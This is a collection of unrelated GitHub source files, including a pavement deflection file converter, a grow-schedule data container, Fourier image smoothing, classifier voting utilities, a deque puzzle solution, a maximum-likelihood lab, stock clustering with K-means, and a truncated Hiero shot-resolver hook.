+{"seq_id":"28233204952","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 21 22:13:00 2017\n\n@author: Coen.Smits, csmits@unihorn.nl\n\n\"\"\"\n\n#from fwdconvert import conversion\n#from fwdconvert import getDefaults\n\ndef conversion( importfile, CROW_factor ):\n\n from datetime import datetime\n import math \n import re\n import os\n \n # Open file\n file = open(importfile, 'r')\n lines = file.read().split('\\n')\n \n # Get starting date of measurements\n datestring = lines[14].split('\\t')[1]\n date = datetime.strptime(datestring, '%d/%m/%y').timestamp()\n filename = lines[7].split('\\t')[1]\n filename = re.sub('.fwd$', '', filename)\n \n # Setup empty variables\n chainage = []\n lane = []\n longitude_raw = []\n lattitude_raw = []\n timestring = []\n time = []\n num_drops_raw = []\n num_drops = []\n drops = []\n #CROW_factor, last_Location = getDefaults()\n timestring2 = []\n longitudeSplitSpace = []\n lattitudeSplitSpace = []\n longitudeDegree = []\n lattitudeDegree = []\n longitudeDecimal = []\n lattitudeDecimal = []\n filePath = os.path.dirname(importfile)\n \n # Fill variables with measurement data\n for current_line in range(0, len(lines)):\n if lines[current_line] =='$2':\n chainage.append(lines[current_line+1].split('\\t')[1])\n \n lane.append(lines[current_line+2].split('\\t')[1])\n \n longitude_raw.append(lines[current_line+5].split('\\t')[1])\n \n lattitude_raw.append(lines[current_line+5].split('\\t')[2])\n \n num_drops_raw.append(lines[current_line+8].split('\\t')[1])\n num_drops.append(num_drops_raw[len(num_drops_raw)-1].split(' ')[3])\n \n timestring.append(lines[current_line+8].split(' 
')[6])\n \n for drop in range(0, int(num_drops[len(num_drops_raw)-1])):\n dropline = (str(len(num_drops_raw)) + '\\t' + lines[current_line+drop+11])\n drops.append(dropline)\n \n for i in range(0,len(timestring)):\n timestring2.append('99/01/01 ' + timestring[i])\n time.append(datetime.strptime(timestring2[i], '%y/%m/%d %H:%M').timestamp()) \n \n longitudeSplitSpace.append(longitude_raw[i].split(' '))\n lattitudeSplitSpace.append(lattitude_raw[i].split(' ')) \n \n if longitudeSplitSpace[i][1] == 'East' and lattitudeSplitSpace[i][1] == 'North':\n \n lattitudeDegree.append(lattitudeSplitSpace[i][2].replace('°', ','))\n lattitudeDegree[i]=lattitudeDegree[i].replace('\\'',',')\n lattitudeDegree[i]=lattitudeDegree[i].replace('\",','')\n \n longitudeDegree.append(longitudeSplitSpace[i][2].replace('°', ','))\n longitudeDegree[i]=longitudeDegree[i].replace('\\'',',')\n longitudeDegree[i]=longitudeDegree[i].replace('\",','')\n \n elif i > 0:\n lattitudeDegree.append(lattitudeDegree[i-1])\n longitudeDegree.append(longitudeDegree[i-1])\n \n else:\n lattitudeDegree.append('52,0,0')\n longitudeDegree.append('5,0,0')\n \n longitude = [[0 for x in range(3)] for y in range(len(longitude_raw))]\n lattitude = [[0 for x in range(3)] for y in range(len(lattitude_raw))] \n \n for y in range (0,len(longitude_raw)):\n for x in range(0,3):\n longitude[y][x] = longitudeDegree[y].split(',')[x]\n \n for y in range (0,len(lattitude_raw)):\n for x in range(0,3):\n lattitude[y][x] = lattitudeDegree[y].split(',')[x]\n \n for i in range(0,len(longitude)):\n longitudeDecimal.append(float(longitude[i][0]) + float(longitude[i][1])/60 + float(longitude[i][2])/3600 )\n lattitudeDecimal.append(float(lattitude[i][0]) + float(lattitude[i][1])/60 + float(lattitude[i][2])/3600 )\n \n # Insert drops-strings in a 2D-array\n deflectiondata = [[0 for x in range(17)] for y in range(len(drops))]\n \n for y in range (0,len(drops)):\n for x in range(0,17):\n deflectiondata[y][x] = drops[y].split('\\t')[x]\n \n # Close .fwd input file \n file.close()\n \n # Create and open output .f25 file\n outputFileName = filePath + '\\\\' + filename + '.f25'\n fileF25 = open(outputFileName, 'w')\n \n # Write header into .f25 file\n file = open('includes\\header.txt', 'r')\n headerLines = file.read().split('\\n')\n \n for i in range(0, 31):\n fileF25.write('%s\\n' % headerLines[i])\n \n fileF25.write('5031,\"%-76s\"\\n' % filename)\n \n for i in range(32, len(headerLines)):\n fileF25.write('%s\\n' % headerLines[i])\n \n # Write data into .f25 file\n dropRowPosition = 0\n for i in range(0, len(num_drops)):\n # Create the lines with loaction and temperature data\n fileF25.write('5280,0, 0,+%2.7f,+00%1.7f,91.7, 4, 10, 100, 0.9 \\n' % (lattitudeDecimal[i], longitudeDecimal[i]) )\n \n # Check if midnight is passed between 2 measurements\n if i >= 1 and time[i] < time[i-1]:\n date = date+86400\n \n fileF25.write('5301,2,1,4,2, %6s,1,1,\"%s \",20%s,%s,%s,%s,%s\\n' % (chainage[i], lane[i], datetime.fromtimestamp(date).strftime('%y'), \\\n datetime.fromtimestamp(date).strftime('%m'), datetime.fromtimestamp(date).strftime('%d'), \\\n datetime.fromtimestamp(time[i]).strftime('%H'), datetime.fromtimestamp(time[i]).strftime('%M')))\n \n if lane[i] == 'R':\n fileF25.write('5302,0,0,A,p,0,0,1,0,\\n')\n elif lane[i] == 'L':\n fileF25.write('5302,0,0,A,p,1,0,0,0,\\n') \n elif lane[i] == 'M':\n fileF25.write('5302,0,0,A,p,0,1,0,0,\\n')\n else:\n fileF25.write('5302,0,0,A,p,0,1,0,0,\\n') \n \n for j in range(0,len(drops)):\n if int(deflectiondata[j][0]) == i+1:\n 
fileF25.write('5303,0,%5.1f,%5.1f,%5.1f\\n' % (float(deflectiondata[j][15]), float(deflectiondata[j][14]), float(deflectiondata[j][13])))\n break\n \n # Create the lines with deflection data \n for j in range(0,int(num_drops[i])):\n fileF25.write(' %2.0f, %5.0f,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0, %5s0\\n' % (j+1, float(deflectiondata[dropRowPosition][12])/(math.pi*0.15*0.15*CROW_factor), deflectiondata[dropRowPosition][2], \\\n deflectiondata[dropRowPosition][3], deflectiondata[dropRowPosition][4], deflectiondata[dropRowPosition][5], \\\n deflectiondata[dropRowPosition][6], deflectiondata[dropRowPosition][7], deflectiondata[dropRowPosition][8], \\\n deflectiondata[dropRowPosition][9], deflectiondata[dropRowPosition][10], deflectiondata[dropRowPosition][16] ))\n dropRowPosition+=1\n \n # Close output .f25 file\n fileF25.close()\n setNewDefaults(CROW_factor, filePath)\n\ndef getDefaults():\n defaultsFile = open(\"defaults.setup\", 'r')\n defaultsLines = defaultsFile.read().split('\\n')\n CROWfactor = float(defaultsLines[1])\n lastLocation = defaultsLines[4]\n defaultsFile.close()\n return CROWfactor, lastLocation\n\ndef setNewDefaults( CROWfactor, lastPath ):\n import os\n os.remove('defaults.setup')\n outputDefaults = 'defaults.setup'\n newOutputDefaults = open(outputDefaults, 'w')\n newOutputDefaults.write(\"\\# CROW Factor:\\n\")\n newOutputDefaults.write(str(CROWfactor))\n newOutputDefaults.write(\" \\n\")\n newOutputDefaults.write(\" \\n\")\n newOutputDefaults.write(\"# Last used filepath: \\n\")\n newOutputDefaults.write(lastPath) \n newOutputDefaults.write(\"\\n\") \n newOutputDefaults.close()\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.filedialog import askopenfilenames\n\nroot = tk.Tk() \n\n#This is where we lauch the file manager bar.\ndef OpenFile():\n CROW_factor, last_Location = getDefaults()\n files = askopenfilenames(initialdir = last_Location,\n filetypes =((\"fwd files\", \"*.fwd\"),(\"All Files\",\"*.*\")),\n title = \"Choose a file.\"\n )\n fileList = root.tk.splitlist(files)\n print (fileList)\n \n #Using try in case user types in unknown file or closes without choosing a file.\n try:\n for i in range(0,len(fileList)):\n with open(fileList[i],'r'):\n conversion(fileList[i], CROW_factor) \n except:\n print(\"No file exists\") \n \n\nCROW_factor, last_Location = getDefaults()\n\nTitle = root.title( \"Unihorn .fwd to .f25 converter tool\")\nroot.minsize(400,200)\nlabel = ttk.Label(root, text =\"CROW Factor: \" + str(CROW_factor),foreground=\"Black\",font=(\"Helvetica\", 10))\n#label.grid(row=1)\n#e1 = ttk.Entry(root)\n#e1.grid(row=1, column=1)\n#e1.insert(0, CROW_factor)\n\n\nlabel.pack()\n#e1.pack()\n\n\n#Menu Bar\n\nmenu = tk.Menu(root)\nroot.config(menu=menu)\nroot.iconbitmap('includes/Icon1.ico')\n\nfile = tk.Menu(menu, tearoff=False)\n\nfile.add_command(label = 'Open', command = OpenFile)\n#file.add_command(label = 'Exit', command = lambda:exit())\n\nmenu.add_cascade(label = 'File', menu = file)\n\nroot.mainloop()\n","repo_name":"ncsmits/FWD-Converter-UH","sub_path":"FWD_Converter_V2.0.py","file_name":"FWD_Converter_V2.0.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29201677669","text":"# from GrowingSchedule import HousMinutes\nimport json\n\nclass DataContainer: \n# технологическая карта \n \n _day = 1\n\n\n Week1data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, 
\n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n\n Week2data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n Week3data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n Week4data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n \n\n def Save(self): \n for item in range(4):\n with open(f\"Data/week_{item+1}_data_file.json\", \"w\") as write_file:\n if(item == 0):\n json.dump(self.Week1data, write_file, indent=4) \n if(item == 1):\n json.dump(self.Week2data, write_file, indent=4)\n if(item == 2):\n json.dump(self.Week3data, write_file, indent=4)\n if(item == 3):\n json.dump(self.Week4data, write_file, indent=4) \n\n with open(\"Data/currentWeekId.json\", \"w\") as week_file: \n json.dump(self._growingWeekNomber, week_file, indent=4) \n\n def GetWeekData(self, week:int):\n with open(f\"Data/week_{week}_data_file.json\", \"r\") as write_file: \n return json.load(write_file) \n\n def GetWeekNomber(self):\n return self._growingWeekNomber\n\n def GetDayNomber(self):\n return self._day\n\n def Load(self):\n for item in range(4):\n with open(f\"Data/week_{item}_data_file.json\", \"r\") as write_file:\n if(item == 0):\n self.Week1data = json.load(write_file) \n\n with open(\"Data/currentWeekId.json\", \"r\")as week_file:\n data = json.load(week_file) \n self._growingWeekNomber = data.get(\"_growingWeek\")\n\nif __name__ == '__main__': \n container = DataContainer()\n container.Save() \n \n print(f\"DataContainer Saved\") \n\n \n\n\n\n\n\n\n\n","repo_name":"MrSpaHrta/Project1","sub_path":"ScheduleData.py","file_name":"ScheduleData.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3558340670","text":"import numpy as np\nimport matplotlib.pyplot as plt\nprint(\"Ingrese el nombre de la imagen a suavizar\")\nimagen = input()\nimg = plt.imread(imagen)\nimg = img[:,:,:3]\nX, Y = img.shape[:2]\npi2 = np.pi * 2\nprint(\"Ingrese el ancho de la gaussiana de suavizado medida en pixeles\")\nsigma = float(input())\n\n#Implementación propia de la transformada de fourier bidimensional\ndef bifourier(array):\n\t(M, N) = array.shape[:2]\n\tfourier = np.zeros((M,N), dtype = complex)\n\tfor k in range(M):\n\t\tfor l in range(N):\n\t\t\tsuma = 0.0\n\t\t\tfor m in range(M):\n\t\t\t\tfor n in range(N):\n\t\t\t\t\tt = np.exp(- 1j * pi2 * ((k * m) / M + (l * n) / N))\n\t\t\t\t\tsuma += array[m,n] * t\n\t\t\t\tfourier[l][k] = suma\n\treturn np.transpose(fourier)\n\n#Implementación propia de la inversa de la transformada de fourier bidimensional\ndef invbifourier(array):\n\t(M, N) = 
array.shape[:2]\n\timagen = np.zeros((M,N), dtype = complex)\n\tfor m in range(M):\n\t\tfor n in range(N):\n\t\t\tsuma = 0.0\n\t\t\tfor k in range(M):\n\t\t\t\tfor l in range(N):\n\t\t\t\t\tt = np.exp(1j * pi2 * ((k * m) / M + (l * n) / N))\n\t\t\t\t\tsuma += array[l][k] * t\n\t\t\tval = suma / (M*N)\n\t\t\timagen[m, n] = val\n\treturn np.transpose(imagen)\n\n#Creación del Kernel gaussiano\ndef gaussian(sig):\n\tt = np.linspace(-10, 10, 20)\n\tgauss = np.exp(-1*(1/2*sig**2)*t**2)\n\tgauss /= np.sum(gauss) # Se normaliza el kernel\n\tkernel = gauss[:, np.newaxis] * gauss[np.newaxis, :]\n\tgaussiana = np.zeros((X,Y))\n\tgaussiana[:kernel.shape[0],:kernel.shape[1]] = kernel\n\treturn gaussiana\n\n# Transformada de fourier del kernel, que resulta ser una gaussiana\nkernel_ft = bifourier(gaussian(sigma)) #Usando mi propia implementación. \n\n# Fourier de la imagen\nimg_ft1 = bifourier(img[:,:,0]) #Usando mi implementación. MM\nimg_ft2 = bifourier(img[:,:,1])\nimg_ft3 = bifourier(img[:,:,2])\nimg_ft = np.zeros((X,Y,3), dtype = complex)\nfor i in range(X):\n\tfor j in range(Y):\n\t\timg_ft[i,j,0] = img_ft1[i,j]\n\t\timg_ft[i,j,1] = img_ft2[i,j]\n\t\timg_ft[i,j,2] = img_ft3[i,j]\n\t\n# Se realiza la convolución. Se acomoda para que las dimensiones del kernel concuerden con la tercera dimension de la imagen (espectro de colores)\nimg2_ft = kernel_ft[:, :, np.newaxis] * img_ft\nimg21 = invbifourier(img2_ft[:,:,0]).real #Usando mi implementación. MM\nimg22 = invbifourier(img2_ft[:,:,1]).real\nimg23 = invbifourier(img2_ft[:,:,2]).real\nimg2 = np.zeros((X,Y,3), dtype = float)\nfor i in range(X):\n\tfor j in range(Y):\n\t\timg2[i,j,0] = img21[i,j]\n\t\timg2[i,j,1] = img22[i,j]\n\t\timg2[i,j,2] = img23[i,j]\n\n# Se acotan los valores al rango esperado\nimg2 = np.clip(img2, 0, 1)\n\n# Se hace una gráfica de lo obtenido\nplt.figure()\nplt.imshow(img2)\nplt.axis('off')\nplt.grid(False)\nplt.savefig(\"suave.png\")\n\n","repo_name":"CamiloBalaguera/CamiloBalaguera_taller4","sub_path":"punto_1/suaveMI.py","file_name":"suaveMI.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39003150058","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef calculate_categorical_crossentropy_loss(predictions, ground_true):\n losses = []\n for prediction, ground in zip(predictions, ground_true):\n loss = 0\n for y_p, y in zip(prediction, ground):\n if y > 0:\n loss -= y * np.log(y_p)\n losses.append(loss)\n return losses\n\n\ndef loss2weight(losses, scaling_type=\"const\", factor=2):\n min_loss = min(losses)\n print(factor)\n if scaling_type == \"const\":\n weights = [i / min_loss for i in losses]\n\n max_weight = max(weights)\n print(max_weight)\n weights = [i * factor / max_weight for i in weights]\n\n avg_weight = sum(weights) / len(weights)\n weights = [i / avg_weight for i in weights]\n\n if scaling_type == \"relative\":\n weights = [i / min_loss for i in losses]\n\n max_weight = max(weights)\n min_weights = min(weights)\n diff = max_weight - min_weights\n print(max_weight)\n weights = [i + (factor) * (i - min_weights) / diff * i for i in weights]\n\n avg_weight = sum(weights) / len(weights)\n weights = [i / avg_weight for i in weights]\n\n return weights\n\n\ndef similarity_matrix(df):\n prediction_collumns = []\n samples, predictions = 0, 0\n for collumn_name in list(df):\n if \"true_label\" in collumn_name:\n prediction_collumns.append(collumn_name)\n samples += 
1\n elif \"prediction\" in collumn_name:\n prediction_collumns.append(collumn_name)\n predictions += 1\n\n if predictions % samples:\n raise ValueError(\"number of predictions per sample must be the same\")\n\n class_number = predictions // samples\n print(f\"sample number: {samples} class_number: {class_number}\")\n probabilities = df[df.columns.intersection(prediction_collumns)]\n\n predictions = []\n\n for index, row in probabilities.iterrows():\n prediction_list = list(row.values)\n predictions.append(\n [\n prediction_list[i * class_number : (i + 1) * class_number].index(\n max(prediction_list[i * class_number : (i + 1) * class_number])\n )\n for i in range(samples)\n ]\n )\n\n similarity = []\n for i in range(probabilities.shape[0]):\n print(i)\n similarity.append([])\n for j in range(probabilities.shape[0]):\n similarity_value = (\n sum(list(map(lambda a, b: a == b, predictions[i], predictions[j])))\n / samples\n )\n similarity[i].append(similarity_value)\n labels = [str(i + 1) for i in range(probabilities.shape[0])]\n # print(similarity)\n\n return pd.DataFrame(similarity, index=labels, columns=labels)\n\n\n# Modified example from https://matplotlib.org/stable/gallery/images_contours_and_fields/image_annotated_heatmap.html\ndef heatmap(data, row_labels, col_labels, ax=None, cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\")\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... and label them with the respective list entries.\n ax.set_xticklabels(col_labels)\n ax.set_yticklabels(row_labels)\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False, labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=-30, ha=\"right\", rotation_mode=\"anchor\")\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1] + 1) - 0.5, minor=True)\n ax.set_yticks(np.arange(data.shape[0] + 1) - 0.5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle=\"-\", linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(\n im,\n data=None,\n valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None,\n **textkw,\n):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. 
\"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max()) / 2.0\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\", verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n texts.append(text)\n\n return texts\n\n\nif __name__ == \"__main__\":\n loss_list = [0.00000001, 0.5, 0.6, 0.4, 0.55, 0.95]\n k = loss2weight(loss_list, scaling_type=\"const\", factor=1.15)\n print(k)","repo_name":"ZuchniakK/VotingAlgorithms","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72468569052","text":"from sys import stdin\nfrom collections import deque\ninput = stdin.readline\n\nn, num_of_pop = map(int, input().split())\nwant_to_pop = list(map(int, input().split()))\nq = deque([ii for ii in range(1, n+1)])\ncount = 0\n\nfor ww in want_to_pop:\n target_index = q.index(ww)\n rotate_direction = -1 if target_index <= len(q) - target_index else 1\n while q[0] != ww:\n q.rotate(rotate_direction)\n count += 1\n q.popleft()\n\nprint(count)\n","repo_name":"jaypae95/problem-solving","sub_path":"deque/백준_1021_회전하는큐.py","file_name":"백준_1021_회전하는큐.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39957473109","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom MVG import logpdf_GAU_ND_fast, vcol, vrow, logpdf_GAU_ND\n\n\ndef loglikelihood(XND, m_ML, C_ML):\n \n MVG = logpdf_GAU_ND_fast(XND, m_ML, C_ML)\n ll = np.sum(MVG)\n \n return ll\n\ndef compute_loglikelihood(data_matrix):\n \n N = data_matrix.shape[1]\n mu = vcol(data_matrix.mean(1)) \n DC = data_matrix - mu \n C = np.dot(DC, DC.T)/N\n ll = loglikelihood(data_matrix, mu, C)\n \n return ll,mu,C\n \n \nif __name__ == '__main__':\n \n # LIKELIHOOD ESTIMATE FOR A GENERIC MATRIX\n XND = np.load(\"utils/XND.npy\")\n ll1 = compute_loglikelihood(XND)[0]\n print(ll1)\n # LIKELIHOOD FOR ONE DIMENSIONAL SAMPLES\n X1D = np.load('utils/X1D.npy')\n ll2,mu,C = compute_loglikelihood(X1D)\n print(ll2)\n \n plt.figure()\n plt.hist(X1D.ravel(), bins=50, density=True)\n XPlot = np.linspace(-8, 12, 1000)\n plt.plot(XPlot.ravel(), np.exp(logpdf_GAU_ND(vrow(XPlot), mu, C)))\n plt.show()\n 
plt.savefig(\"images/One_dimension_MLE.pdf\")\n ","repo_name":"Nicocarad/Machine_Learining_and_Pattern_Recognition","sub_path":"Laboratory/Lab4/MLE.py","file_name":"MLE.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29076495917","text":"#%%\r\nimport os\r\nimport fnmatch\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\n#%%\r\n\"\"\"\r\n6.1 Create a table/data frame with the closing prices of 30 different \r\nstocks, with 10 from each of the caps\r\n\r\n6.2 Calculate average annual percentage return and volatility of all \r\n30 stocks over a theoretical one year period.\r\n\"\"\"\r\ncaps = [\"Large_Cap/Large_Cap\",\r\n \"Mid_Cap\",\r\n \"Small_Cap\"\r\n ]\r\n\r\ndfs = {}\r\ndailyValues = {}\r\nannualValues = {}\r\nfor cap in caps:\r\n i=1\r\n \r\n for file_name in os.listdir('Data/'+f\"{cap}\"): \r\n if fnmatch.fnmatch(file_name, '*.csv') and i<11:\r\n name = file_name.split('.')[0] # getting the name without extension\r\n dfs[name] = pd.read_csv(f'Data/{cap}/{file_name}') # making df out of csv file\r\n\r\n # preprocessing\r\n dfs[name] = dfs[name][dfs[name][\"Series\"] == \"EQ\"] \r\n dfs[name].Date = pd.to_datetime(dfs[name]['Date'])\r\n dfs[name] = dfs[name].set_index('Date')\r\n \r\n # calculating values i.e. mean and std\r\n dfs[name][\"dailyChange\"] = dfs[name][\"Close Price\"].pct_change()\r\n dfs[name].dropna(inplace = True)\r\n \r\n # (std, mean)\r\n dailyValues[name] = [dfs[name].dailyChange.std(), dfs[name].dailyChange.mean()]\r\n annualValues[name] = [dailyValues[name][0]*(252**0.5), dailyValues[name][1]*252]\r\n \r\n i +=1\r\nprint('(name: [std, mean])')\r\nprint(' -- -- -- Daily')\r\nfor i in dailyValues.items():\r\n print(i)\r\n \r\nprint('')\r\nprint(' -- -- -- Annual') \r\nfor i in annualValues.items():\r\n print(i)\r\n \r\n#%%\r\n\"\"\"\r\n6.3 Cluster the 30 stocks according to their mean annual Volatilities \r\nand Returns using K-means clustering. Identify the optimum number of \r\nclusters using the Elbow curve method\r\n\"\"\"\r\ndata = pd.DataFrame.from_dict(annualValues, orient='index', columns=[\"std\", \"mean\"])\r\n\r\n#%%\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.cluster import KMeans\r\n\r\n# Transforming data\r\nmms = MinMaxScaler()\r\nmms.fit(data)\r\ntransformedData = mms.transform(data)\r\n\r\n# calculating Inertia avrage dist. 
b/w the cluster center and its points\r\nSum_of_squared_distances = []\r\nK = range(1, 31)\r\nfor k in K:\r\n km = KMeans(n_clusters=k)\r\n km = km.fit(transformedData)\r\n Sum_of_squared_distances.append(km.inertia_)\r\n\r\n# Plotting the Elbow Method Graph\r\nfig, ax = plt.subplots(figsize=(10, 5))\r\n\r\nax.plot(K, Sum_of_squared_distances, 'bx-')\r\n\r\nplt.xticks(K)\r\nplt.xlabel('k')\r\n\r\n# plt.yticks(Sum_of_squared_distances)\r\nplt.ylabel('Sum_of_squared_distances')\r\n\r\nplt.title('Elbow Method For Optimal k')\r\nplt.show()\r\n\r\n#%%\r\n\"\"\"\r\n6.4 Prepare a separate Data frame to show which stocks belong to the \r\nsame cluster \r\n\"\"\"\r\n# Using k=6\r\nk=6\r\nkm = KMeans(n_clusters=k)\r\nkm = km.fit(transformedData)\r\n\r\n#%%\r\ndata['labels'] = km.labels_\r\ncenters = km.cluster_centers_\r\ny_kmeans = km.predict(transformedData)\r\n\r\n#%%\r\nplt.style.use('bmh')\r\n\r\nfig, ax = plt.subplots(figsize=(10, 6))\r\nax.scatter(transformedData[:, 0], \r\n transformedData[:, 1], \r\n c=y_kmeans, \r\n s=50, \r\n cmap='viridis'\r\n )\r\n\r\nax.scatter(centers[:, 0], \r\n centers[:, 1], \r\n c='black', \r\n s=8000, \r\n alpha=0.05\r\n )\r\n\r\nfont = {'family': 'serif',\r\n 'color': 'black',\r\n 'weight': 'normal',\r\n 'size': 6,\r\n }\r\n\r\nfor x, y, name in zip(transformedData[:, 0], transformedData[:, 1], data.index):\r\n ax.text(x, \r\n y, \r\n name, \r\n fontdict=font,\r\n # verticalalignment='center', \r\n # horizontalalignment='center',\r\n rotation=0\r\n )\r\n\r\n\r\nfont = {'family': 'serif',\r\n 'color': 'gray',\r\n 'weight': 'normal',\r\n 'size': 28,\r\n }\r\n\r\nfor i, cord in enumerate(centers):\r\n ax.text(cord[0], \r\n cord[1], \r\n f\"C{i}\",\r\n horizontalalignment='center',\r\n verticalalignment='center', \r\n fontdict=font, \r\n rotation=0, \r\n alpha=0.3\r\n )\r\n\r\nplt.title('K-Means Clustering')\r\nplt.show()\r\n#%%\r\n","repo_name":"abecus/CareerLauncherMlInternship","sub_path":"mod6.py","file_name":"mod6.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30386775903","text":"from sgtk import Hook\n\n\nclass HieroResolveCustomStrings(Hook):\n \"\"\"Translates a keyword string into its resolved value for a given task.\"\"\"\n # cache of shots that have already been pulled from shotgun\n _sg_lookup_cache = {}\n\n def execute(self, task, keyword, **kwargs):\n \"\"\"\n The default implementation of the custom resolver simply looks up\n the keyword from the shotgun shot dictionary.\n\n For example, to pull the shot code, you would simply specify 'code'.\n To pull the sequence code you would use 'sg_sequence.Sequence.code'.\n \"\"\"\n\n if keyword == \"{Episode}\":\n episode_entity = self.parent.execute_hook_method(\n \"hook_get_shot\",\n \"get_episode\",\n data=self.parent.preprocess_data,\n hiero_sequence=task._item.parentSequence(),\n )\n # hard coded to return the name of the episode\n # if however your folder for the episode in the schema, is not just made up from the code field\n # you need to get it to return what ever string value the folder would normally be created with.\n return episode_entity['code']\n\n shot_code = task._item.name()\n\n # grab the shot from the cache, or the get_shot hook if not cached\n sg_shot = self._sg_lookup_cache.get(shot_code)\n if sg_shot is None:\n fields = [ctf['keyword'] for ctf in self.parent.get_setting('custom_template_fields')]\n sg_shot = self.parent.execute_hook(\n \"hook_get_shot\",\n task=task,\n 
